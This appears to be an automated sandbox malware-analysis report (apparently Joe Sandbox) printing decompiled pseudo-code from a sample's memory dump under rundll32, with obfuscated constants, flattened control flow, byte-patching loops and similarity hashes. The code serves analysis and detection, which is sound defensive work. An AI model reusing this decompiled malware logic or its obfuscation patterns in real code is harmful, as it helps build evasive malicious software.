                                                                                                                                                            				_t467 = 0x4e;
                                                                                                                                                            				_v196 = _v196 * 0x7e;
                                                                                                                                                            				_v196 = _v196 ^ 0xa26962db;
                                                                                                                                                            				_v196 = _v196 ^ 0xee89d9da;
                                                                                                                                                            				_v220 = 0x1e88f4;
                                                                                                                                                            				_v220 = _v220 >> 4;
                                                                                                                                                            				_v220 = _v220 >> 7;
                                                                                                                                                            				_v220 = _v220 ^ 0x000c14cc;
                                                                                                                                                            				_v140 = 0xc2e6ba;
                                                                                                                                                            				_v140 = _v140 + 0x8875;
                                                                                                                                                            				_v140 = _v140 ^ 0x00c43ba1;
                                                                                                                                                            				_v188 = 0xdb74c;
                                                                                                                                                            				_v188 = _v188 << 4;
                                                                                                                                                            				_v188 = _v188 * 0x5c;
                                                                                                                                                            				_v188 = _v188 ^ 0x4edda20a;
                                                                                                                                                            				_v236 = 0x62ea5;
                                                                                                                                                            				_v236 = _v236 / _t467;
                                                                                                                                                            				_v236 = _v236 >> 0xb;
                                                                                                                                                            				_v236 = _v236 ^ 0x7372adb3;
                                                                                                                                                            				_v236 = _v236 ^ 0x73757ff2;
                                                                                                                                                            				_v144 = 0x2b6271;
                                                                                                                                                            				_v144 = _v144 ^ 0x1ac7dce1;
                                                                                                                                                            				_v144 = _v144 ^ 0x1ae73668;
                                                                                                                                                            				_v224 = 0x8bb898;
                                                                                                                                                            				_v224 = _v224 + 0x43a9;
                                                                                                                                                            				_v224 = _v224 << 0x10;
                                                                                                                                                            				_t468 = 0x71;
                                                                                                                                                            				_t469 = _v132;
                                                                                                                                                            				_v224 = _v224 / _t468;
                                                                                                                                                            				_v224 = _v224 ^ 0x023712cd;
                                                                                                                                                            				_v156 = 0xb23c07;
                                                                                                                                                            				_v156 = _v156 + 0x4ded;
                                                                                                                                                            				_v156 = _v156 ^ 0x00b7ca1c;
                                                                                                                                                            				_v168 = 0xb501ce;
                                                                                                                                                            				_v168 = _v168 ^ 0x6706c67f;
                                                                                                                                                            				_v168 = _v168 ^ 0x67b3c7a1;
                                                                                                                                                            				_v176 = 0xab8984;
                                                                                                                                                            				_v176 = _v176 * 0x22;
                                                                                                                                                            				_v176 = _v176 ^ 0x16c84308;
                                                                                                                                                            				goto L1;
                                                                                                                                                            				do {
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L1:
                                                                                                                                                            						_t474 = _t408 - 0xd9acfaa;
                                                                                                                                                            						if(_t474 > 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t474 == 0) {
                                                                                                                                                            							E00388519(_v236, _v144, _v128);
                                                                                                                                                            							_t408 = 0xfbb751f;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t408 == 0x15a913b) {
                                                                                                                                                            							_v40 = _t456;
                                                                                                                                                            							_v92 =  &_v32;
                                                                                                                                                            							_v56 =  *_t455;
                                                                                                                                                            							_v52 =  *((intOrPtr*)(_t455 + 4));
                                                                                                                                                            							_v88 = 0x20;
                                                                                                                                                            							_t393 = E00377735(_v192,  &_v112,  &_v120, _v228, _v208);
                                                                                                                                                            							_t471 = _t471 + 0x10;
                                                                                                                                                            							if(_t393 == 0) {
                                                                                                                                                            								L20:
                                                                                                                                                            								return _v132;
                                                                                                                                                            							}
                                                                                                                                                            							_t408 = 0xf0a856e;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t408 == 0x3749e66) {
                                                                                                                                                            							_t469 = E00380AE0(_v176, _v168);
                                                                                                                                                            							_t408 = 0x46acfc9;
                                                                                                                                                            							 *((intOrPtr*)(_t406 + 4)) = _v160 + _v124 + _t469;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t408 == 0x46acfc9) {
                                                                                                                                                            							_push(_t408);
                                                                                                                                                            							_push(_t408);
                                                                                                                                                            							_t403 = E00377FF2( *((intOrPtr*)(_t406 + 4)));
                                                                                                                                                            							 *_t406 = _t403;
                                                                                                                                                            							if(_t403 == 0) {
                                                                                                                                                            								_t408 = 0xd9acfaa;
                                                                                                                                                            							} else {
                                                                                                                                                            								_v132 = 1;
                                                                                                                                                            								_t408 = 0xfb3baa2;
                                                                                                                                                            							}
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t408 != 0x8e80a37) {
                                                                                                                                                            							goto L31;
                                                                                                                                                            						}
                                                                                                                                                            						_t408 = 0xfac38db;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t408 == 0xf0a856e) {
                                                                                                                                                            						_t377 = E003770B3(_v164,  &_v128,  &_v120, _v232, _v172);
                                                                                                                                                            						_t471 = _t471 + 0xc;
                                                                                                                                                            						if(_t377 == 0) {
                                                                                                                                                            							_t408 = 0xfbb751f;
                                                                                                                                                            							goto L31;
                                                                                                                                                            						}
                                                                                                                                                            						_t408 = 0x3749e66;
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t408 == 0xfac38db) {
                                                                                                                                                            						_push( *_t455);
                                                                                                                                                            						_t378 = E0038AE6D(_v240,  &_v32,  *((intOrPtr*)(_t455 + 4)), _v180, _t408, _v248);
                                                                                                                                                            						_t471 = _t471 + 0x14;
                                                                                                                                                            						if(_t378 == 0) {
                                                                                                                                                            							goto L20;
                                                                                                                                                            						}
                                                                                                                                                            						_t408 = 0x15a913b;
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t408 == 0xfb3baa2) {
                                                                                                                                                            						_t457 =  *_t406;
                                                                                                                                                            						E00377E87(_v268, _v216, _v200, _t457);
                                                                                                                                                            						_t458 = _t457 + _v264;
                                                                                                                                                            						E0037ED7E(_v212, _t458, _v152, _v128, _v124);
                                                                                                                                                            						_t459 = _t458 + _v124;
                                                                                                                                                            						E0037A492(_v196, _v220, _t459, _t469);
                                                                                                                                                            						_t450 =  &(_t459[_t469]);
                                                                                                                                                            						_t471 = _t471 + 0x20;
                                                                                                                                                            						_t414 = _t459;
                                                                                                                                                            						if(_t459 >= _t450) {
                                                                                                                                                            							L25:
                                                                                                                                                            							_t386 = E00380AE0(0xe, 0);
                                                                                                                                                            							_t408 = 0xd9acfaa;
                                                                                                                                                            							 *((char*)(_t386 + _t459)) = 0;
                                                                                                                                                            							_t456 = _a4;
                                                                                                                                                            							goto L1;
                                                                                                                                                            						} else {
                                                                                                                                                            							goto L22;
                                                                                                                                                            						}
                                                                                                                                                            						do {
                                                                                                                                                            							L22:
                                                                                                                                                            							if(( *_t414 & 0x000000ff) == _v256) {
                                                                                                                                                            								 *_t414 = 0xc3;
                                                                                                                                                            							}
                                                                                                                                                            							_t414 =  &(_t414[1]);
                                                                                                                                                            						} while (_t414 < _t450);
                                                                                                                                                            						goto L25;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t408 != 0xfbb751f) {
                                                                                                                                                            						goto L31;
                                                                                                                                                            					}
                                                                                                                                                            					E00388519(_v224, _v156, _v120);
                                                                                                                                                            					goto L20;
                                                                                                                                                            					L31:
                                                                                                                                                            				} while (_t408 != 0x5927677);
                                                                                                                                                            				goto L20;
                                                                                                                                                            			}












































































                                                                                                                                                            0x0037d0be
                                                                                                                                                            0x0037d0c6
                                                                                                                                                            0x0037d0cb
                                                                                                                                                            0x0037d0d8
                                                                                                                                                            0x0037d0dc
                                                                                                                                                            0x0037d0e4
                                                                                                                                                            0x0037d0ec
                                                                                                                                                            0x0037d0f8
                                                                                                                                                            0x0037d0fd
                                                                                                                                                            0x0037d103
                                                                                                                                                            0x0037d10b
                                                                                                                                                            0x0037d116
                                                                                                                                                            0x0037d11e
                                                                                                                                                            0x0037d129
                                                                                                                                                            0x0037d131
                                                                                                                                                            0x0037d13e
                                                                                                                                                            0x0037d141
                                                                                                                                                            0x0037d14a
                                                                                                                                                            0x0037d14e
                                                                                                                                                            0x0037d156
                                                                                                                                                            0x0037d15e
                                                                                                                                                            0x0037d163
                                                                                                                                                            0x0037d16b
                                                                                                                                                            0x0037d17b
                                                                                                                                                            0x0037d184
                                                                                                                                                            0x0037d187
                                                                                                                                                            0x0037d18b
                                                                                                                                                            0x0037d193
                                                                                                                                                            0x0037d19e
                                                                                                                                                            0x0037d1a9
                                                                                                                                                            0x0037d1b4
                                                                                                                                                            0x0037d1bc
                                                                                                                                                            0x0037d1c1
                                                                                                                                                            0x0037d1c6
                                                                                                                                                            0x0037d1ce
                                                                                                                                                            0x0037d1d6
                                                                                                                                                            0x0037d1de
                                                                                                                                                            0x0037d1e3
                                                                                                                                                            0x0037d1e8
                                                                                                                                                            0x0037d1f0
                                                                                                                                                            0x0037d1f8
                                                                                                                                                            0x0037d1fd
                                                                                                                                                            0x0037d205
                                                                                                                                                            0x0037d209
                                                                                                                                                            0x0037d211
                                                                                                                                                            0x0037d219
                                                                                                                                                            0x0037d226
                                                                                                                                                            0x0037d22a
                                                                                                                                                            0x0037d232
                                                                                                                                                            0x0037d23a
                                                                                                                                                            0x0037d247
                                                                                                                                                            0x0037d248
                                                                                                                                                            0x0037d24c
                                                                                                                                                            0x0037d254
                                                                                                                                                            0x0037d25c
                                                                                                                                                            0x0037d26a
                                                                                                                                                            0x0037d273
                                                                                                                                                            0x0037d277
                                                                                                                                                            0x0037d27f
                                                                                                                                                            0x0037d287
                                                                                                                                                            0x0037d28c
                                                                                                                                                            0x0037d291
                                                                                                                                                            0x0037d299
                                                                                                                                                            0x0037d2a4
                                                                                                                                                            0x0037d2af
                                                                                                                                                            0x0037d2ba
                                                                                                                                                            0x0037d2c5
                                                                                                                                                            0x0037d2d0
                                                                                                                                                            0x0037d2db
                                                                                                                                                            0x0037d2ec
                                                                                                                                                            0x0037d2ef
                                                                                                                                                            0x0037d2f3
                                                                                                                                                            0x0037d2fb
                                                                                                                                                            0x0037d303
                                                                                                                                                            0x0037d30b
                                                                                                                                                            0x0037d310
                                                                                                                                                            0x0037d315
                                                                                                                                                            0x0037d31d
                                                                                                                                                            0x0037d328
                                                                                                                                                            0x0037d333
                                                                                                                                                            0x0037d33e
                                                                                                                                                            0x0037d346
                                                                                                                                                            0x0037d350
                                                                                                                                                            0x0037d354
                                                                                                                                                            0x0037d35c
                                                                                                                                                            0x0037d36c
                                                                                                                                                            0x0037d370
                                                                                                                                                            0x0037d375
                                                                                                                                                            0x0037d37d
                                                                                                                                                            0x0037d385
                                                                                                                                                            0x0037d390
                                                                                                                                                            0x0037d39b
                                                                                                                                                            0x0037d3a6
                                                                                                                                                            0x0037d3ae
                                                                                                                                                            0x0037d3b6
                                                                                                                                                            0x0037d3bf
                                                                                                                                                            0x0037d3c2
                                                                                                                                                            0x0037d3c9
                                                                                                                                                            0x0037d3cd
                                                                                                                                                            0x0037d3d5
                                                                                                                                                            0x0037d3e0
                                                                                                                                                            0x0037d3eb
                                                                                                                                                            0x0037d3f6
                                                                                                                                                            0x0037d3fe
                                                                                                                                                            0x0037d406
                                                                                                                                                            0x0037d40e
                                                                                                                                                            0x0037d41b
                                                                                                                                                            0x0037d41f
                                                                                                                                                            0x0037d41f
                                                                                                                                                            0x0037d427
                                                                                                                                                            0x0037d427
                                                                                                                                                            0x0037d427
                                                                                                                                                            0x0037d427
                                                                                                                                                            0x0037d42d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d433
                                                                                                                                                            0x0037d553
                                                                                                                                                            0x0037d559
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d559
                                                                                                                                                            0x0037d43f
                                                                                                                                                            0x0037d4e3
                                                                                                                                                            0x0037d4f6
                                                                                                                                                            0x0037d4ff
                                                                                                                                                            0x0037d509
                                                                                                                                                            0x0037d51f
                                                                                                                                                            0x0037d52b
                                                                                                                                                            0x0037d530
                                                                                                                                                            0x0037d535
                                                                                                                                                            0x0037d5a7
                                                                                                                                                            0x0037d5b8
                                                                                                                                                            0x0037d5b8
                                                                                                                                                            0x0037d537
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d537
                                                                                                                                                            0x0037d44b
                                                                                                                                                            0x0037d4b7
                                                                                                                                                            0x0037d4cb
                                                                                                                                                            0x0037d4d0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d4d0
                                                                                                                                                            0x0037d453
                                                                                                                                                            0x0037d477
                                                                                                                                                            0x0037d478
                                                                                                                                                            0x0037d479
                                                                                                                                                            0x0037d47e
                                                                                                                                                            0x0037d484
                                                                                                                                                            0x0037d498
                                                                                                                                                            0x0037d486
                                                                                                                                                            0x0037d486
                                                                                                                                                            0x0037d491
                                                                                                                                                            0x0037d491
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d484
                                                                                                                                                            0x0037d45b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d461
                                                                                                                                                            0x0037d461
                                                                                                                                                            0x0037d569
                                                                                                                                                            0x0037d6ac
                                                                                                                                                            0x0037d6b1
                                                                                                                                                            0x0037d6b6
                                                                                                                                                            0x0037d6c2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d6c2
                                                                                                                                                            0x0037d6b8

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $qb+$rg'$uwjP$za%$M
                                                                                                                                                            • API String ID: 0-3591755710
                                                                                                                                                            • Opcode ID: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                                                            • Instruction ID: 48377582796e00c06f44843ca0cb8da6dde0267441b1308fabe044ed11b842e4
                                                                                                                                                            • Opcode Fuzzy Hash: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                                                            • Instruction Fuzzy Hash: 16121F715083808FD369CF25C48AA5BBBF1FFC4348F50891DF69A8A261DBB5A944CF42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E0038907F(intOrPtr* __ecx) {
                                                                                                                                                            				intOrPtr* _v4;
                                                                                                                                                            				char _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				unsigned int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				signed int _v108;
                                                                                                                                                            				signed int _v112;
                                                                                                                                                            				signed int _v116;
                                                                                                                                                            				signed int _v120;
                                                                                                                                                            				signed int _v124;
                                                                                                                                                            				signed int _v128;
                                                                                                                                                            				signed int _v132;
                                                                                                                                                            				void* _t284;
                                                                                                                                                            				void* _t285;
                                                                                                                                                            				intOrPtr _t286;
                                                                                                                                                            				void* _t293;
                                                                                                                                                            				void* _t301;
                                                                                                                                                            				signed int _t304;
                                                                                                                                                            				signed int _t305;
                                                                                                                                                            				signed int _t306;
                                                                                                                                                            				signed int _t307;
                                                                                                                                                            				signed int _t308;
                                                                                                                                                            				void* _t311;
                                                                                                                                                            				intOrPtr* _t343;
                                                                                                                                                            				void* _t347;
                                                                                                                                                            				signed int* _t348;
                                                                                                                                                            
                                                                                                                                                            				_t348 =  &_v132;
                                                                                                                                                            				_t343 = __ecx;
                                                                                                                                                            				_v4 = __ecx;
                                                                                                                                                            				_v40 = 0x7c806d;
                                                                                                                                                            				_v40 = _v40 + 0x9e80;
                                                                                                                                                            				_v40 = _v40 ^ 0x007d1eed;
                                                                                                                                                            				_v12 = 0xea5ac0;
                                                                                                                                                            				_v12 = _v12 + 0xffff451e;
                                                                                                                                                            				_v12 = _v12 ^ 0x00e99fde;
                                                                                                                                                            				_v24 = 0xace3a9;
                                                                                                                                                            				_t347 = 0;
                                                                                                                                                            				_t304 = 0xa;
                                                                                                                                                            				_v24 = _v24 / _t304;
                                                                                                                                                            				_v24 = _v24 ^ 0x001149f7;
                                                                                                                                                            				_t301 = 0x97dfe60;
                                                                                                                                                            				_v112 = 0x63471f;
                                                                                                                                                            				_v112 = _v112 ^ 0x706c6b64;
                                                                                                                                                            				_v112 = _v112 | 0x0d4cecae;
                                                                                                                                                            				_v112 = _v112 << 3;
                                                                                                                                                            				_v112 = _v112 ^ 0xea7f67f8;
                                                                                                                                                            				_v28 = 0x68a2fc;
                                                                                                                                                            				_t305 = 0x5b;
                                                                                                                                                            				_v28 = _v28 * 0x1c;
                                                                                                                                                            				_v28 = _v28 ^ 0x0b71d390;
                                                                                                                                                            				_v84 = 0x508d02;
                                                                                                                                                            				_v84 = _v84 | 0x7bfb7ba7;
                                                                                                                                                            				_v84 = _v84 ^ 0x7bffa5e3;
                                                                                                                                                            				_v124 = 0xc0d8a4;
                                                                                                                                                            				_v124 = _v124 + 0xffffd7c7;
                                                                                                                                                            				_v124 = _v124 ^ 0xdba96bec;
                                                                                                                                                            				_v124 = _v124 + 0xffffcd63;
                                                                                                                                                            				_v124 = _v124 ^ 0xdb66cc39;
                                                                                                                                                            				_v116 = 0xc7a01f;
                                                                                                                                                            				_v116 = _v116 * 0x50;
                                                                                                                                                            				_v116 = _v116 << 7;
                                                                                                                                                            				_v116 = _v116 + 0x525d;
                                                                                                                                                            				_v116 = _v116 ^ 0x3100192e;
                                                                                                                                                            				_v88 = 0x173e76;
                                                                                                                                                            				_v88 = _v88 / _t305;
                                                                                                                                                            				_v88 = _v88 + 0xcdb8;
                                                                                                                                                            				_v88 = _v88 ^ 0x00098d3b;
                                                                                                                                                            				_v48 = 0x3a45de;
                                                                                                                                                            				_t306 = 0x3d;
                                                                                                                                                            				_v48 = _v48 / _t306;
                                                                                                                                                            				_v48 = _v48 ^ 0x0006d702;
                                                                                                                                                            				_v52 = 0xd8d0f7;
                                                                                                                                                            				_v52 = _v52 | 0xabcf1793;
                                                                                                                                                            				_v52 = _v52 + 0xffff6a1e;
                                                                                                                                                            				_v52 = _v52 ^ 0xabd8e28c;
                                                                                                                                                            				_v64 = 0xff5420;
                                                                                                                                                            				_v64 = _v64 >> 9;
                                                                                                                                                            				_v64 = _v64 + 0xffff2626;
                                                                                                                                                            				_v64 = _v64 ^ 0xfff0768b;
                                                                                                                                                            				_v80 = 0x65116e;
                                                                                                                                                            				_v80 = _v80 >> 9;
                                                                                                                                                            				_v80 = _v80 | 0xde6750c8;
                                                                                                                                                            				_v80 = _v80 ^ 0xde6208e1;
                                                                                                                                                            				_v56 = 0x2d6903;
                                                                                                                                                            				_v56 = _v56 >> 0xc;
                                                                                                                                                            				_v56 = _v56 + 0xffff4c70;
                                                                                                                                                            				_v56 = _v56 ^ 0xfff58c10;
                                                                                                                                                            				_v132 = 0xe5be5a;
                                                                                                                                                            				_v132 = _v132 + 0xfffffbec;
                                                                                                                                                            				_v132 = _v132 << 3;
                                                                                                                                                            				_v132 = _v132 ^ 0x46ad3c03;
                                                                                                                                                            				_v132 = _v132 ^ 0x418237eb;
                                                                                                                                                            				_v108 = 0x3fa801;
                                                                                                                                                            				_v108 = _v108 + 0x902;
                                                                                                                                                            				_v108 = _v108 >> 7;
                                                                                                                                                            				_v108 = _v108 ^ 0x9ac0b97a;
                                                                                                                                                            				_v108 = _v108 ^ 0x9ac73a04;
                                                                                                                                                            				_v72 = 0x454e35;
                                                                                                                                                            				_v72 = _v72 + 0x4c9c;
                                                                                                                                                            				_t307 = 0x29;
                                                                                                                                                            				_v72 = _v72 / _t307;
                                                                                                                                                            				_v72 = _v72 ^ 0x000328df;
                                                                                                                                                            				_v32 = 0x46b9f;
                                                                                                                                                            				_v32 = _v32 >> 4;
                                                                                                                                                            				_v32 = _v32 ^ 0x0003d4b9;
                                                                                                                                                            				_v16 = 0xab007f;
                                                                                                                                                            				_v16 = _v16 ^ 0x56a4e801;
                                                                                                                                                            				_v16 = _v16 ^ 0x56002f48;
                                                                                                                                                            				_v100 = 0xb9d48c;
                                                                                                                                                            				_v100 = _v100 | 0xb434f54e;
                                                                                                                                                            				_v100 = _v100 >> 0x10;
                                                                                                                                                            				_v100 = _v100 ^ 0x000dcd0e;
                                                                                                                                                            				_v92 = 0x17070b;
                                                                                                                                                            				_t308 = 0x37;
                                                                                                                                                            				_v92 = _v92 / _t308;
                                                                                                                                                            				_v92 = _v92 << 7;
                                                                                                                                                            				_v92 = _v92 ^ 0x0038b56c;
                                                                                                                                                            				_v60 = 0xdb418a;
                                                                                                                                                            				_v60 = _v60 * 0x4d;
                                                                                                                                                            				_v60 = _v60 << 2;
                                                                                                                                                            				_v60 = _v60 ^ 0x07c52fa3;
                                                                                                                                                            				_v68 = 0x99d1b0;
                                                                                                                                                            				_v68 = _v68 << 1;
                                                                                                                                                            				_v68 = _v68 + 0xadc1;
                                                                                                                                                            				_v68 = _v68 ^ 0x01384a96;
                                                                                                                                                            				_v120 = 0xfb4a64;
                                                                                                                                                            				_v120 = _v120 | 0x92bfeeef;
                                                                                                                                                            				_v120 = _v120 + 0x1827;
                                                                                                                                                            				_v120 = _v120 >> 5;
                                                                                                                                                            				_v120 = _v120 ^ 0x0494323d;
                                                                                                                                                            				_v128 = 0xf75f57;
                                                                                                                                                            				_v128 = _v128 >> 4;
                                                                                                                                                            				_v128 = _v128 + 0xe158;
                                                                                                                                                            				_v128 = _v128 + 0xffff16ce;
                                                                                                                                                            				_v128 = _v128 ^ 0x000f9950;
                                                                                                                                                            				_v76 = 0xb94cf;
                                                                                                                                                            				_v76 = _v76 | 0xc911a6ab;
                                                                                                                                                            				_v76 = _v76 >> 2;
                                                                                                                                                            				_v76 = _v76 ^ 0x3240c46f;
                                                                                                                                                            				_v104 = 0x7ca07;
                                                                                                                                                            				_v104 = _v104 * 0x23;
                                                                                                                                                            				_v104 = _v104 >> 4;
                                                                                                                                                            				_v104 = _v104 ^ 0xe4d42587;
                                                                                                                                                            				_v104 = _v104 ^ 0xe4c14657;
                                                                                                                                                            				_v44 = 0x308a5a;
                                                                                                                                                            				_v44 = _v44 >> 0x10;
                                                                                                                                                            				_v44 = _v44 ^ 0x0006e55e;
                                                                                                                                                            				_v96 = 0x427aa5;
                                                                                                                                                            				_v96 = _v96 + 0xed3d;
                                                                                                                                                            				_v96 = _v96 + 0xffff13f4;
                                                                                                                                                            				_v96 = _v96 ^ 0x0046a078;
                                                                                                                                                            				_v20 = 0xf8f4;
                                                                                                                                                            				_v20 = _v20 * 0x4a;
                                                                                                                                                            				_t284 = 0x4469cd4;
                                                                                                                                                            				_v20 = _v20 ^ 0x004ab19f;
                                                                                                                                                            				_v36 = 0x7998ac;
                                                                                                                                                            				_v36 = _v36 >> 0xc;
                                                                                                                                                            				_v36 = _v36 ^ 0x0008cf6c;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t301 != _t284) {
                                                                                                                                                            						if(_t301 == 0x661bd7c) {
                                                                                                                                                            							E0037957D(_v8, _v96, _v20, _v28, _v36);
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t301 == 0x8cd68b1) {
                                                                                                                                                            								_push(_v116);
                                                                                                                                                            								_push(_v124);
                                                                                                                                                            								_t293 = E0038DCF7(_v84, 0x371954, __eflags);
                                                                                                                                                            								_push(_v52);
                                                                                                                                                            								_push(_v48);
                                                                                                                                                            								__eflags = E00379462(_t293, _v80,  &_v8, E0038DCF7(_v88, 0x371814, __eflags), _v56, _v40) - _v12;
                                                                                                                                                            								_t301 =  ==  ? 0x4469cd4 : 0x94c729c;
                                                                                                                                                            								E0037A8B0(_v132, _t293, _v108);
                                                                                                                                                            								E0037A8B0(_v72, _t294, _v32);
                                                                                                                                                            								_t343 = _v4;
                                                                                                                                                            								L8:
                                                                                                                                                            								_t284 = 0x4469cd4;
                                                                                                                                                            								_t348 =  &(_t348[0xb]);
                                                                                                                                                            								goto L9;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t301 != 0x97dfe60) {
                                                                                                                                                            									goto L9;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t301 = 0x8cd68b1;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L12:
                                                                                                                                                            						return _t347;
                                                                                                                                                            					}
                                                                                                                                                            					_push(_v92);
                                                                                                                                                            					_push(_v100);
                                                                                                                                                            					_t285 = E0038DCF7(_v16, 0x371854, __eflags);
                                                                                                                                                            					_pop(_t311);
                                                                                                                                                            					_t286 =  *0x393dfc; // 0x0
                                                                                                                                                            					__eflags = E0037AA4D(_v60, _t285,  *((intOrPtr*)(_t343 + 4)), _v120, _v24, _v8, _t286 + 0x40, _v128, _t311,  *_t343, _v76) - _v112;
                                                                                                                                                            					_t301 = 0x661bd7c;
                                                                                                                                                            					_t347 =  ==  ? 1 : _t347;
                                                                                                                                                            					E0037A8B0(_v104, _t285, _v44);
                                                                                                                                                            					goto L8;
                                                                                                                                                            					L9:
                                                                                                                                                            					__eflags = _t301 - 0x94c729c;
                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                            				goto L12;
                                                                                                                                                            			}
                                                                                                                                                            0x0038932f
                                                                                                                                                            0x00389333
                                                                                                                                                            0x00389338
                                                                                                                                                            0x00389340
                                                                                                                                                            0x0038934d
                                                                                                                                                            0x00389351
                                                                                                                                                            0x00389356
                                                                                                                                                            0x0038935e
                                                                                                                                                            0x00389366
                                                                                                                                                            0x0038936a
                                                                                                                                                            0x00389372
                                                                                                                                                            0x0038937a
                                                                                                                                                            0x00389382
                                                                                                                                                            0x0038938a
                                                                                                                                                            0x00389392
                                                                                                                                                            0x00389397
                                                                                                                                                            0x0038939f
                                                                                                                                                            0x003893a7
                                                                                                                                                            0x003893ac
                                                                                                                                                            0x003893b4
                                                                                                                                                            0x003893bc
                                                                                                                                                            0x003893c4
                                                                                                                                                            0x003893cc
                                                                                                                                                            0x003893d4
                                                                                                                                                            0x003893d9
                                                                                                                                                            0x003893e1
                                                                                                                                                            0x003893ee
                                                                                                                                                            0x003893f2
                                                                                                                                                            0x003893f7
                                                                                                                                                            0x003893ff
                                                                                                                                                            0x00389407
                                                                                                                                                            0x0038940f
                                                                                                                                                            0x00389414
                                                                                                                                                            0x0038941c
                                                                                                                                                            0x00389424
                                                                                                                                                            0x0038942c
                                                                                                                                                            0x00389434
                                                                                                                                                            0x0038943c
                                                                                                                                                            0x0038944f
                                                                                                                                                            0x00389456
                                                                                                                                                            0x0038945b
                                                                                                                                                            0x00389466
                                                                                                                                                            0x0038946e
                                                                                                                                                            0x00389473
                                                                                                                                                            0x0038947b
                                                                                                                                                            0x0038947b
                                                                                                                                                            0x00389489
                                                                                                                                                            0x003895e5
                                                                                                                                                            0x0038948f
                                                                                                                                                            0x00389495
                                                                                                                                                            0x003894aa
                                                                                                                                                            0x003894b3
                                                                                                                                                            0x003894bb
                                                                                                                                                            0x003894c0
                                                                                                                                                            0x003894cb
                                                                                                                                                            0x0038950e
                                                                                                                                                            0x00389519
                                                                                                                                                            0x0038951c
                                                                                                                                                            0x0038952e
                                                                                                                                                            0x00389533
                                                                                                                                                            0x003895b5
                                                                                                                                                            0x003895b5
                                                                                                                                                            0x003895ba
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389497
                                                                                                                                                            0x0038949d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003894a3
                                                                                                                                                            0x003894a3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003894a3
                                                                                                                                                            0x0038949d
                                                                                                                                                            0x00389495
                                                                                                                                                            0x003895ef
                                                                                                                                                            0x003895f9
                                                                                                                                                            0x003895f9
                                                                                                                                                            0x0038953c
                                                                                                                                                            0x00389545
                                                                                                                                                            0x00389550
                                                                                                                                                            0x00389556
                                                                                                                                                            0x00389564
                                                                                                                                                            0x003895a0
                                                                                                                                                            0x003895a2
                                                                                                                                                            0x003895ab
                                                                                                                                                            0x003895b0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003895bd
                                                                                                                                                            0x003895bd
                                                                                                                                                            0x003895bd
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
